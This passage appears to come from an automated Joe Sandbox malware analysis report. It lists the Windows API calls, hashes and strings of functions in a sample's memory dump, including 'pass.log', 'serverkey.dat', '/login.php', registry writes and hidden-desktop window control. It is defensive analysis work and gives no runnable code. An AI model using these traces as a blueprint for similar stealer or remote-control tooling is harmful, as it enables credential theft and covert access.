                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C92
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 013096E6
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapValidate.KERNEL32(00000000), ref: 013096ED
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?), ref: 013096FA
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapFree.KERNEL32(00000000), ref: 01309701
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 01309710
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapValidate.KERNEL32(00000000), ref: 01309713
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?), ref: 01309720
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapFree.KERNEL32(00000000), ref: 01309723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$HandleProcess$CloseFreeInformationValidate$FileUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3732962355-0
                                                                                                                                                                                                              • Opcode ID: 6498fbba8fd166898b8fe1cd88aff8c251c20806a594dca95546932748461d50
                                                                                                                                                                                                              • Instruction ID: 206f99d29cd9e1a2ede0293870691eba07f3ffc4243a410c5409456aa9947903
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6498fbba8fd166898b8fe1cd88aff8c251c20806a594dca95546932748461d50
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F511D3709023049FEB32DF69DA487AAFBFCEF45608F2005ADE989D3281E7709905C710
                                                                                                                                                                                                              Function 012FAA20 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,775B5180,?,012E1368,?,?), ref: 012FAA37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA54
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA5B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013,?,?,775B5180,?,012E1368,?,?,?,?,serverkey.dat), ref: 012FAA6B
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,775B5180,?,012E1368,?,?), ref: 012FAA88
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 913929354-0
                                                                                                                                                                                                              • Opcode ID: fb34c329e40567601306812c9a8843c0098fcdf8aac1d8b282304162b5a4f4e2
                                                                                                                                                                                                              • Instruction ID: 9d4990cfa847f9e445b66c6caf9c432a37e4a3339d4643a14e4d48a43e12d925
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb34c329e40567601306812c9a8843c0098fcdf8aac1d8b282304162b5a4f4e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E01717264222677E63159699C48FE77F6C9F46BB0F140328FB18AA1C4DA60D908C2F4
                                                                                                                                                                                                              Function 012F80A6 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 012F80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 012F8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 012F8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 012F812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 012F8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              • Opcode ID: fe0bae27b1cc338d79c3a213a00afe572862c90b8d6bdd03d4db1d4ffeebe0bd
                                                                                                                                                                                                              • Instruction ID: 7086af14f087805c95744806f08adcb1a149a454cab0f496c9ef563aff7c64d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe0bae27b1cc338d79c3a213a00afe572862c90b8d6bdd03d4db1d4ffeebe0bd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C11543152021ADBDB31DB68DC48BEAFBB8AF16700F1446ADDB51A72C0D7709A44CFA1
                                                                                                                                                                                                              Function 012E6BB9 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 012E6C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6C21
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 012E6C5C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3057210225-0
                                                                                                                                                                                                              • Opcode ID: a52bf5a309a8e330ceb2de042df5203a4cbe0b0359ffa2392273facb625bda25
                                                                                                                                                                                                              • Instruction ID: 0ed57e5a713a18692e1698d3942f148df46b449fa79b9c733f771f9aea760c71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a52bf5a309a8e330ceb2de042df5203a4cbe0b0359ffa2392273facb625bda25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75118270E5125917FB36AB348C0DBED7BA8EF28700F4045ACFB45E2180D7B08A948790
                                                                                                                                                                                                              Function 012E6A90 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • #680.SHELL32(?), ref: 012E6AB4
                                                                                                                                                                                                                • Part of subcall function 012E6980: memset.MSVCRT(?,00000000,000000FF), ref: 012E69A2
                                                                                                                                                                                                                • Part of subcall function 012E6980: memset.MSVCRT(?,00000000,00000103,?,00000000,000000FF), ref: 012E69C0
                                                                                                                                                                                                                • Part of subcall function 012E6980: lstrcpynA.KERNEL32(?,?,00000104), ref: 012E69DD
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?,?,00000104), ref: 012E6A4D
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegSetValueExA.ADVAPI32(?,9E2B3B9Fa,00000000,00000001,?,00000104,?,00000104), ref: 012E6A6F
                                                                                                                                                                                                                • Part of subcall function 012E6980: RegCloseKey.ADVAPI32(?,?,00000104), ref: 012E6A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E6AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E6AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012E6AF4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E6AF7
                                                                                                                                                                                                                • Part of subcall function 012E6690: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012E66B0
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,00000000,00000000,00000001,00000000,/login.php,012E6E36,00000000,00000000,00000000,00000000,00000000,?,00000000,774D0F10), ref: 012E670F
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,774D0F10), ref: 012E671F
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,00000004,?,?,?,?,774D0F10), ref: 012E6729
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,774D0F10), ref: 012E6734
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,?,?,?,?,?,?,774D0F10), ref: 012E674F
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,?,?,774D0F10), ref: 012E675C
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,00000004,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6766
                                                                                                                                                                                                                • Part of subcall function 012E6690: exit.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6771
                                                                                                                                                                                                                • Part of subcall function 012E6690: calloc.MSVCRT(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,774D0F10), ref: 012E6794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$#680CloseFreeOpenValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1224010128-0
                                                                                                                                                                                                              • Opcode ID: 31279c948b90fe3b70620331f133fdd3c8ffa51dcf1cf4bae5c27e1781b396d5
                                                                                                                                                                                                              • Instruction ID: 6e1da3a6060d74a44581a7b68b175fe40103bf9c6de17a0cffec2e98176c5b6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31279c948b90fe3b70620331f133fdd3c8ffa51dcf1cf4bae5c27e1781b396d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F044325512169ADA306EA6A80CBDA7A9CEBA1756F408015F705D6144CBB5D000C7F5
                                                                                                                                                                                                              Function 012ED230 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 012ED242
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 012ED259
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012ED26F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012ED280
                                                                                                                                                                                                              • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 012ED297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1270303404-0
                                                                                                                                                                                                              • Opcode ID: 719252dad094a465d5e8251cc3988ad4095e2ddb836ffbe19b78bb92da2d6e42
                                                                                                                                                                                                              • Instruction ID: 7c06cab558a8be0d5ae85ca14786fa82b922c7202747fcbdbad56344ebf55151
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 719252dad094a465d5e8251cc3988ad4095e2ddb836ffbe19b78bb92da2d6e42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC018135951318BBEB30EB949C09FEE7B6CAB05B11F400288FB00A60C5D7F09B448BE5
                                                                                                                                                                                                              Function 012EE380 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,?,00000000,774D3080,?,012E922C,?,00000006,00000000), ref: 012EE38C
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001,?,012E922C,?,00000006,00000000), ref: 012EE3A3
                                                                                                                                                                                                              • GetWindow.USER32(00000000,?,012E922C,?,00000006,00000000), ref: 012EE3A6
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000006,?,012E922C,?,012E922C,?,00000006,00000000), ref: 012EE3BD
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003,?,012E922C,?,00000006,00000000), ref: 012EE3C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3855296974-0
                                                                                                                                                                                                              • Opcode ID: 0bacbd29cfaed8da61f6ee13cd81d97b2462224559581f07686a0319e1b6452c
                                                                                                                                                                                                              • Instruction ID: 2ecdcd43365ca1c3a316f5eca9550981e64c47a1a927fe2850ac9a16c84bf260
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bacbd29cfaed8da61f6ee13cd81d97b2462224559581f07686a0319e1b6452c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F08276201218BFD731AF69EC88EABB3ACDB88760F014109FE0097344D6B0ED008BB0
                                                                                                                                                                                                              Function 012ED2B0 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 012ED2BC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012ED2C4
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 012ED2D0
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000000D,?,?), ref: 012ED2E1
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 012ED2ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2643679612-0
                                                                                                                                                                                                              • Opcode ID: 7f21000cb41e07982d6969da7addd73feb77ef5f394670d5baa55aeb3412093d
                                                                                                                                                                                                              • Instruction ID: 9e0b2a6244ad9e50a7c1c5ffb5c59a6883e62e49385ef6a69307d4eefe134c65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f21000cb41e07982d6969da7addd73feb77ef5f394670d5baa55aeb3412093d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF01C72301204BBD3306EA6AC8DFEBBB6CEB49762F10401AFA0597281C6B0990087B0
                                                                                                                                                                                                              Function 012EE340 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,?,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE34A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE352
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE364
                                                                                                                                                                                                              • GetFocus.USER32(?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE366
                                                                                                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,012E9F24,?,?,?,?,012E9400,?,?), ref: 012EE373
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 968181190-0
                                                                                                                                                                                                              • Opcode ID: 8450f0bf5271931b3a62810d46dd75da395d5ad9bcc2917d3dcecc4991a4dc0d
                                                                                                                                                                                                              • Instruction ID: 972041e33cf09614fd2010d9e6cee6ca977452470e929ba89de39e0e2a59c60d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8450f0bf5271931b3a62810d46dd75da395d5ad9bcc2917d3dcecc4991a4dc0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E01271A01314BBD6306BA6AC4DFEBBB6CEB86766F500059FA09D3240D675AE0087B4
                                                                                                                                                                                                              Function 012E7980 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,012E3E3A), ref: 012E7987
                                                                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 012E7992
                                                                                                                                                                                                              • #680.SHELL32 ref: 012E799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012E79A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012E79AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$#680CreateDirectoryFolderMakePathSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1413619216-0
                                                                                                                                                                                                              • Opcode ID: b5e3f287e39bece9f41711e2f5d6d2986f306e39f83c1763b67cfc020201a1ac
                                                                                                                                                                                                              • Instruction ID: dbaa48d47529d387c246e563df53e1ef7bbaa2ed7a1d2a63663343318a7a0199
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5e3f287e39bece9f41711e2f5d6d2986f306e39f83c1763b67cfc020201a1ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4D0E2312121119BEB322F36A80C7AE3AACBF46B42F58001CFA01E1148DB24C20287A9
                                                                                                                                                                                                              Function 012FB410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB437
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FB4A0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                              • String ID: 61c5c09f$pass.log
                                                                                                                                                                                                              • API String ID: 1760361154-24786173
                                                                                                                                                                                                              • Opcode ID: 9dafbd52574acd4cd384e56fcb9b8647feac15616bdb62bdf6f3d5909f127d3b
                                                                                                                                                                                                              • Instruction ID: 3feb65d569401465a29645275f11bef41b561da7c6befd24cb28dfd04c9cb5e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dafbd52574acd4cd384e56fcb9b8647feac15616bdb62bdf6f3d5909f127d3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41112B3050465A4BCB369E2CA5786E6BFE4EB86314F1481EDDAC987316D9708448C790
                                                                                                                                                                                                              Function 012EC430 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 012EC464
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 012EC486
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,0000FFFF,000000FF,00000002), ref: 012EC499
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$AttributesClassInfoLayeredLongName
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 195909263-4251816714
                                                                                                                                                                                                              • Opcode ID: 0f1a918c26ee5208f2c333cd61e039a4162b9da5fa9363c4f777bd0b2ac4aae9
                                                                                                                                                                                                              • Instruction ID: 8b60125ae0d8ab9c688aa9f048ddfc9763833e8e1148f0267b3f59f81c36ff79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f1a918c26ee5208f2c333cd61e039a4162b9da5fa9363c4f777bd0b2ac4aae9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0A4306641176AFB74AAA8D80EBBE7BACEF00750FA00128FB01E1194EB64D5648795
                                                                                                                                                                                                              Function 012AEE50 Relevance: 6.5, Strings: 5, Instructions: 297COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Desk$\$o$p$t
                                                                                                                                                                                                              • API String ID: 0-1766595857
                                                                                                                                                                                                              • Opcode ID: 039ba6ad8b911574e6c5fa99f210a85cdf914ec6e900127014e58647964caa2c
